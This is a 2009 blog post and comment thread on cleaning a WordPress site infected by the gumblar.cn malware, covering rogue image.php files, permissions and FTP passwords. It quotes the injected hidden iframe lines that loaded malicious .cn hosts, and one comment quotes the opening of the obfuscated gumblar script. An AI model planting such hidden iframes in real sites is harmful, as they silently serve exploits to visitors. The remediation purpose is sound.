How to protect your website from gumblar.cn infection

How to protect your website from gumblar.cn infection

Posted on 06. May, 2009 by Tahir Akram in Blogging

Yesterday one of my websites got infected by a suspicious malware gumblar.cn. This website contains several exploits and trojans that can harm your system. How it starts its infection is to invoke Adobe Acrobat Reader on your machine. I found after browsing my infected site, Acrobat Reader process was running in Task Manager.

According to Google Safe Browsing Service

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-05, and the last time suspicious content was found on this site was on 2009-05-05.
Malicious software includes 2341 scripting exploit(s), 6 trojan(s).

This site was hosted on 1 network(s) including AS42831 (UKSERVERS).

gumblar_cn_infection
I found some of php files were altered by adding a iframe at the end of the page. My infected files were <my-url>/wp-content/themes/<my-theme-dir>/index.php and <my-url>/wp-admin/index.php and in same directory index-extra.php. I didnt found any other file which was infected by this.

I manually removed this embedded iframe  <iframe src=”http://liteautotop .cn/ts/in.cgi?mozila” width=2 height=4 style=”visibility: hidden”></iframe>  and every things works fine.

If you have some type of information about this infection, people will highly appriciate who are messing arround the internet about the solution of this problem.

Update (5/11/09): I am able to remove this malware from my blog and Wordpress admin site.

Removal

  • Removed image.php file from all images folder. image.php infection only found in ‘image’ folder. Make sure you didn’t remove the orignal image.php file. If your orignal file infected, only remove malicious code
  • Looked for iframe code added on the top or bottom of php page and remove it. I found this iframe which I removed. <iframe src=”http: //bigtruckstopseek .cn/ts/in.cgi?banner2″ width=2 height=4 style=”visibility: hidden”>
  • Checked all PHP, HTML and JS  files for added anonymous Java Script methods. I found all JS files infected in wp-include directory
  • Put httpdoc directory permission to 755
  • Scaned my computer with Malwarebytes’ Anti-Malware, which identified several threats and removed
  • Updated my AVG Anti Virus
  • Changed my FTP password
  • I did all this manual code removal activity from my Pleask control panel

Please fell free to make comment and your suggestions to make more security measures to prevent such threats.

Related Posts

Tags: , ,

22 Responses to “How to protect your website from gumblar.cn infection”

  1. Gaurav

    06. May, 2009

    Yes – One of my client as also been infected by this malware. Everytime we remove it, it manages to creep back into the system.

    Most professionals are using Avast on your computer and a Secure FTP while uploading and files onto the server.

    This is the best information that I have read so far. Perhaps it could be useful for someone.

    http://www.dynamicdrive.com/forums/showthread.php?t=43390&page=3

    If there is any more valuable information we could be keen to learn.

  2. Tahir Akram

    06. May, 2009

    Thanks Gaurav for your comments.

    I will consider the software that your recommend for secure uploading. After my manual removal, it didn’t happen to inject in my files any more.

    I also recommend that hosting providers should upgrade their Linux machine with latest security patches. A Linux machine without a security patches is the most vulnerable.

  3. adel sarlak

    08. May, 2009

    I found this virus 10 days ago and 4th of my customers got it .

    We removed it more than 10 times but the next day amazingly it was on all pages again .

    I found the source file .

    I each “Images” folder in your site it will copy a php file “image.php” .

    Before removing the script from pages , you must rewrite a same file instead of image.php and change the permissions .

    Then remove the scripts .

    If your site gets the iframe version as fast as you can , you must remove the iframe then replace the image.php .

    Because google may consider your site as a harmful site .

    A good news is that .asp files won’t get this virus .

    Another thing is that , in cms sites i changes the permissions of template folders !!!

  4. Tahir Akram

    08. May, 2009

    Thanks adel. The same is happening with me. After removing iframe code from my infected pages I found it appears again. The thing you talk about image.php and changing permission of theme folder looks very helpful. Lets see after following this, this malware infection removed permanently or not.

  5. Denis

    08. May, 2009

    Tahir,

    Unfortunately your site is still infected. Both with the iframe from “bigtruckstopseek .cn” (which is actually not the gumblar exploit) and with the real “gumblar” script, which can be fount right before the body tag. It starts with “(function(){var CEz9t=’%';var fQJ=(‘va.72.20a.3d.22S…“.

    Read my article about this exploit. There are many comments with additional information that may help you get rid of this exploit.
    http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

  6. Tahir Akram

    09. May, 2009

    Enough files that I have found infected by this. I am unable to find the code you mentioned in my PHP files. But let me tell I use fact no. 10 given in your blog. And I am also able to remove iframe for bigtruckstopseek.cn/ts/in.cgi?banner2. Your blog is very helpful.

  7. Lloyd Jacob Lopez

    09. May, 2009

    Hi Guys,

    I had the same issue, after cleaning the file it came back again. The problem seems to be you might have given global access to the folder. When I removed the access and gave read only and write access to admin, the problem was solved.

    Guys check and let me know if it works.

    Regards,
    Lloyd

  8. Tahir Akram

    10. May, 2009

    Lloyd what chmod you are using for your directories. The problem for me is if I remove write and executable access from ‘Other’ group, by blog appears in blank page. So I am thinking what chmod will suit my situation. Any idea…

  9. Denis

    10. May, 2009

    Here you will find “Permission Scheme for WordPress”
    http://codex.wordpress.org/Changing_File_Permissions

    Here is another good article to read:
    http://codex.wordpress.org/Hardening_WordPress

  10. ST

    10. May, 2009

    @Tahir Akram: I’d say start with chmod 755. That will prevent anyone except for the owner from having write access.

  11. Tahir Akram

    11. May, 2009

    Thanks Denis, ST, Gaurav, adel & Lloyd for your comments and support to remove this threat.

    I am successfully removed this threat from my blog and wordpress admin. And I pretty much followed what you said. I have updated the post with my course of actions. Please feel free to make comment.

    Again thanks.

  12. Amir

    12. May, 2009

    Hello
    now is a few days when i open my site my Persian.be antivirus gives that Application firefox contains to web page gumblar .cn/rrs/?id=, uses to steal password, credit card numbers or other confidential data. Denied.
    what can i do to fix it?

  13. Bu vir

    12. May, 2009

    [...] 12.05.2009 | 15:30 | #2 S

  14. Tahir Akram

    13. May, 2009

    Amir you need to follow the steps given in this post and by Denis (comments no. 5).

  15. Gagan Sodhi

    21. May, 2009

    I want to getrid of gumblar.cn problem so, could u plz help me.

  16. Gagan Sodhi

    21. May, 2009

    HI, All
    i want this gumblar problem will not come again. plz help me?

  17. Tahir Akram

    22. May, 2009

    Hi Gagan;

    Did you follow the steps given in this post and discussion. I hope you will get rid of it. As I did. Just do start it.

  18. Naresh

    23. May, 2009

    we are found a script. please help me how to protect our site from gumblar.cn infection

  19. Tahir Akram

    23. May, 2009

    Naresh, Please share your findings here to let us know what remedy steps you required.

  20. Pick Shane’s Brain » Blog Archive » Yikes!

    30. May, 2009

    [...] http://www.pakzilla.com/2009/05/06/how-to-protect-your-website-from-gumblarcn-infection/ [...]

  21. rm

    01. Jun, 2009

    Don’t forget the error documents of your website, even if they reside outside of the httpdocs tree.
    Access was gained via FTP, so please check where your FTP login has access (i.e httpdocs, httsdocs, cgi-bin, errordocs, …)

    Next, CHECK YOUR COMPUTER, for you will have been infected. http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/

  22. Archivos html y php infectados - Foro de Spyware

    08. Jun, 2009

    [...] problema: Gumblar .cn Exploit – 12 Facts About This Injected Script | Unmask Parasites. Blog. How to protect your website from gumblar.cn infection | Pakzilla | be a technology monster Descarga y actualiza <Malwarebytes’ Anti-Malware+ Leer_manual> Salu2………….> [...]

Leave a Reply

PHVsPjxsaT48c3Ryb25nPndvb19hZHNfcm90YXRlPC9zdHJvbmc+IC0gdHJ1ZTwvbGk+PGxpPjxzdHJvbmc+d29vX2FkXzI1MF9hZHNlbnNlPC9zdHJvbmc+IC0gPC9saT48bGk+PHN0cm9uZz53b29fYWRfMjUwX2ltYWdlPC9zdHJvbmc+IC0gaHR0cDovL3d3dy53b290aGVtZXMuY29tL2Fkcy93b290aGVtZXMtMjUweDI1MC5naWY8L2xpPjxsaT48c3Ryb25nPndvb19hZF8yNTBfdXJsPC9zdHJvbmc+IC0gaHR0cDovL3d3dy53b290aGVtZXMuY29tPC9saT48bGk+PHN0cm9uZz53b29fYWRfY29udGVudF9hZHNlbnNlPC9zdHJvbmc+IC0gPHNjcmlwdCB0eXBlPVwidGV4dC9qYXZhc2NyaXB0XCI+PCEtLQ0KZ29vZ2xlX2FkX2NsaWVudCA9IFwicHViLTkwOTMzNzc1OTY1NzA1NDJcIjsNCi8qIDQ2OHg2MCwgY3JlYXRlZCA2LzE4LzEwICovDQpnb29nbGVfYWRfc2xvdCA9IFwiNDE4MTYxNDI5MlwiOw0KZ29vZ2xlX2FkX3dpZHRoID0gNDY4Ow0KZ29vZ2xlX2FkX2hlaWdodCA9IDYwOw0KLy8tLT4NCjwvc2NyaXB0Pg0KPHNjcmlwdCB0eXBlPVwidGV4dC9qYXZhc2NyaXB0XCINCnNyYz1cImh0dHA6Ly9wYWdlYWQyLmdvb2dsZXN5bmRpY2F0aW9uLmNvbS9wYWdlYWQvc2hvd19hZHMuanNcIj4NCjwvc2NyaXB0PjwvbGk+PGxpPjxzdHJvbmc+d29vX2FkX2NvbnRlbnRfZGlzYWJsZTwvc3Ryb25nPiAtIGZhbHNlPC9saT48bGk+PHN0cm9uZz53b29fYWRfY29udGVudF9pbWFnZTwvc3Ryb25nPiAtIGh0dHA6Ly93d3cud29vdGhlbWVzLmNvbS9hZHMvd29vdGhlbWVzLTQ2OHg2MC0yLmdpZjwvbGk+PGxpPjxzdHJvbmc+d29vX2FkX2NvbnRlbnRfdXJsPC9zdHJvbmc+IC0gaHR0cDovL3d3dy53b290aGVtZXMuY29tPC9saT48bGk+PHN0cm9uZz53b29fYWRfaW1hZ2VfMTwvc3Ryb25nPiAtIGh0dHA6Ly93d3cud29vdGhlbWVzLmNvbS9hZHMvd29vdGhlbWVzLTEyNXgxMjUtMS5naWY8L2xpPjxsaT48c3Ryb25nPndvb19hZF9pbWFnZV8yPC9zdHJvbmc+IC0gaHR0cDovL3d3dy53b290aGVtZXMuY29tL2Fkcy93b290aGVtZXMtMTI1eDEyNS0yLmdpZjwvbGk+PGxpPjxzdHJvbmc+d29vX2FkX2ltYWdlXzM8L3N0cm9uZz4gLSBodHRwOi8vd3d3Lndvb3RoZW1lcy5jb20vYWRzL3dvb3RoZW1lcy0xMjV4MTI1LTMuZ2lmPC9saT48bGk+PHN0cm9uZz53b29fYWRfaW1hZ2VfNDwvc3Ryb25nPiAtIGh0dHA6Ly93d3cud29vdGhlbWVzLmNvbS9hZHMvd29vdGhlbWVzLTEyNXgxMjUtNC5naWY8L2xpPjxsaT48c3Ryb25nPndvb19hZF9pbWFnZV81PC9zdHJvbmc+IC0gaHR0cDovL3d3dy53b290aGVtZXMuY29tL2Fkcy93b290aGVtZXMtMTI1eDEyNS00LmdpZjwvbGk+PGxpPjxzdHJvbmc+d29vX2FkX2ltYWdlXzY8L3N0cm9uZz4gLSBodHRwOi8vd3d3Lndvb3RoZW1lcy5jb20vYWRzL3dvb3RoZW1lcy0xMjV4MTI1LTQuZ2lmPC9saT48bGk+PHN0cm9uZz53b29fYWRfdG9wX2Fkc2Vuc2U8L3N0cm9uZz4gLSA8L2xpPjxsaT48c3Ryb25nPndvb19hZF90b3BfZGlzYWJsZTwvc3Ryb25nPiAtIGZhbHNlPC9saT48bGk+PHN0cm9uZz53b29fYWRfdG9wX2ltYWdlPC9zdHJvbmc+IC0gaHR0cDovL3d3dy53b290aGVtZXMuY29tL2Fkcy93b290aGVtZXMtNDY4eDYwLTIuZ2lmPC9saT48bGk+PHN0cm9uZz53b29fYWRfdG9wX3VybDwvc3Ryb25nPiAtIGh0dHA6Ly93d3cud29vdGhlbWVzLmNvbTwvbGk+PGxpPjxzdHJvbmc+d29vX2FkX3VybF8xPC9zdHJvbmc+IC0gaHR0cDovL3d3dy53b290aGVtZXMuY29tPC9saT48bGk+PHN0cm9uZz53b29fYWRfdXJsXzI8L3N0cm9uZz4gLSBodHRwOi8vd3d3Lndvb3RoZW1lcy5jb208L2xpPjxsaT48c3Ryb25nPndvb19hZF91cmxfMzwvc3Ryb25nPiAtIGh0dHA6Ly93d3cud29vdGhlbWVzLmNvbTwvbGk+PGxpPjxzdHJvbmc+d29vX2FkX3VybF80PC9zdHJvbmc+IC0gaHR0cDovL3d3dy53b290aGVtZXMuY29tPC9saT48bGk+PHN0cm9uZz53b29fYWRfdXJsXzU8L3N0cm9uZz4gLSBodHRwOi8vd3d3Lndvb3RoZW1lcy5jb208L2xpPjxsaT48c3Ryb25nPndvb19hZF91cmxfNjwvc3Ryb25nPiAtIGh0dHA6Ly93d3cud29vdGhlbWVzLmNvbTwvbGk+PGxpPjxzdHJvbmc+d29vX2FsdF9zdHlsZXNoZWV0PC9zdHJvbmc+IC0gZ3JleS5jc3M8L2xpPjxsaT48c3Ryb25nPndvb19hdXRvX2ltZzwvc3Ryb25nPiAtIGZhbHNlPC9saT48bGk+PHN0cm9uZz53b29fY2F0X2V4PC9zdHJvbmc+IC0gPC9saT48bGk+PHN0cm9uZz53b29fY29tbWVudF9wb3N0czwvc3Ryb25nPiAtIFNlbGVjdCBhIG51bWJlcjo8L2xpPjxsaT48c3Ryb25nPndvb19jb250ZW50PC9zdHJvbmc+IC0gZmFsc2U8L2xpPjxsaT48c3Ryb25nPndvb19jb250ZW50X2FyY2hpdmVzPC9zdHJvbmc+IC0gZmFsc2U8L2xpPjxsaT48c3Ryb25nPndvb19jb250ZW50X2ZlYXQ8L3N0cm9uZz4gLSBmYWxzZTwvbGk+PGxpPjxzdHJvbmc+d29vX2N1c3RvbV9mYXZpY29uPC9zdHJvbmc+IC0gaHR0cDovL3Bha3ppbGxhLmNvbS93cC1jb250ZW50L3RoZW1lcy9vcGVuYWlyL2Zhdmljb24uaWNvPC9saT48bGk+PHN0cm9uZz53b29fZmVhdHVyZWRfcG9zdHM8L3N0cm9uZz4gLSAxPC9saT48bGk+PHN0cm9uZz53b29fZmVlZGJ1cm5lcl9pZDwvc3Ryb25nPiAtIGh0dHA6Ly9mZWVkYnVybmVyLmdvb2dsZS5jb20vZmIvYS9tYWlsdmVyaWZ5P3VyaT1wYWt6aWxsYSZsb2M9ZW5fVVM8L2xpPjxsaT48c3Ryb25nPndvb19mZWVkYnVybmVyX3VybDwvc3Ryb25nPiAtIGh0dHA6Ly9mZWVkcy5mZWVkYnVybmVyLmNvbS9wYWt6aWxsYTwvbGk+PGxpPjxzdHJvbmc+d29vX2dvb2dsZV9hbmFseXRpY3M8L3N0cm9uZz4gLSA8L2xpPjxsaT48c3Ryb25nPndvb19ob21lX2FyYzwvc3Ryb25nPiAtIHRydWU8L2xpPjxsaT48c3Ryb25nPndvb19ob21lX2xpbms8L3N0cm9uZz4gLSB0cnVlPC9saT48bGk+PHN0cm9uZz53b29faG9tZV9saW5rX2Rlc2M8L3N0cm9uZz4gLSBXZSBsaXZlIGhlcmU8L2xpPjxsaT48c3Ryb25nPndvb19ob21lX2xpbmtfdGV4dDwvc3Ryb25nPiAtIEhvbWU8L2xpPjxsaT48c3Ryb25nPndvb19ob21lX3RodW1iX2hlaWdodDwvc3Ryb25nPiAtIDkyPC9saT48bGk+PHN0cm9uZz53b29faG9tZV90aHVtYl93aWR0aDwvc3Ryb25nPiAtIDI0NzwvbGk+PGxpPjxzdHJvbmc+d29vX2ltYWdlX2hlaWdodDwvc3Ryb25nPiAtIDIxMDwvbGk+PGxpPjxzdHJvbmc+d29vX2ltYWdlX3NpbmdsZTwvc3Ryb25nPiAtIGZhbHNlPC9saT48bGk+PHN0cm9uZz53b29faW1hZ2Vfd2lkdGg8L3N0cm9uZz4gLSA1NDA8L2xpPjxsaT48c3Ryb25nPndvb19sb2dvPC9zdHJvbmc+IC0gaHR0cDovL3Bha3ppbGxhLmNvbS9pbWFnZXMvcGFremlsbGEtbG9nby5wbmc8L2xpPjxsaT48c3Ryb25nPndvb19tYW51YWw8L3N0cm9uZz4gLSBodHRwOi8vd3d3Lndvb3RoZW1lcy5jb20vc3VwcG9ydC90aGVtZS1kb2N1bWVudGF0aW9uL2J1c3ktYmVlLzwvbGk+PGxpPjxzdHJvbmc+d29vX3BvcHVsYXJfcG9zdHM8L3N0cm9uZz4gLSBTZWxlY3QgYSBudW1iZXI6PC9saT48bGk+PHN0cm9uZz53b29fcmVzaXplPC9zdHJvbmc+IC0gdHJ1ZTwvbGk+PGxpPjxzdHJvbmc+d29vX3Nob3J0bmFtZTwvc3Ryb25nPiAtIHdvbzwvbGk+PGxpPjxzdHJvbmc+d29vX3NpbmdsZV9oZWlnaHQ8L3N0cm9uZz4gLSAxMjA8L2xpPjxsaT48c3Ryb25nPndvb19zaW5nbGVfd2lkdGg8L3N0cm9uZz4gLSAxODA8L2xpPjxsaT48c3Ryb25nPndvb190YWJzPC9zdHJvbmc+IC0gZmFsc2U8L2xpPjxsaT48c3Ryb25nPndvb190aGVtZW5hbWU8L3N0cm9uZz4gLSBCdXN5IEJlZTwvbGk+PGxpPjxzdHJvbmc+d29vX3RodW1iX2hlaWdodDwvc3Ryb25nPiAtIDg4PC9saT48bGk+PHN0cm9uZz53b29fdGh1bWJfd2lkdGg8L3N0cm9uZz4gLSA4ODwvbGk+PGxpPjxzdHJvbmc+d29vX3R3aXR0ZXI8L3N0cm9uZz4gLSB0YWhpcmFrcmFtPC9saT48bGk+PHN0cm9uZz53b29fdmlkZW9fY2F0ZWdvcnk8L3N0cm9uZz4gLSBTZWxlY3QgYSBjYXRlZ29yeTo8L2xpPjwvdWw+